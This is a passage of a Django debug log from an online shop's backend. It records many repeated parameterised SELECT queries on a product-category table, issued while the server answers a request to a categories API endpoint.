(0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:48:18,834 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:48:18,836 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:48:18,840 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:48:18,842 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:48:18,845 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:48:18,847 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:48:18,849 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:48:18,852 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:48:18,855 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:48:18,857 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:48:18,859 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:48:18,861 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:48:18,865 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:48:18,867 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:48:18,869 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:48:18,872 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:48:18,874 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:48:18,876 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:48:18,879 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:48:18,881 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:48:18,883 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:48:18,886 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:48:18,888 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:48:18] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:48:20,500 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:48:20,507 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:48:20,511 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:48:20,514 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:48:20,518 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:48:20,521 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:48:20,524 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:48:20,527 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:48:20,530 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:48:20,534 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:48:20,537 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:48:20,539 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:48:20,542 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:48:20,544 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:48:20,547 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:48:20,549 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:48:20,552 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:48:20,554 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:48:20,556 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:48:20,560 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:48:20,565 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:48:20,569 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:48:20,573 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:48:20,577 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:48:20,581 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:48:20,587 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:48:20,592 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:48:20,596 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:48:20,600 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:48:20,604 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:48:20,610 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:48:20,614 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:48:20,618 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:48:20,622 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:48:20,626 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:48:20,633 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:48:20,638 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:48:20,642 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:48:20,646 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:48:20,650 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:48:20,654 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:48:20,660 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:48:20,664 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:48:20,668 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 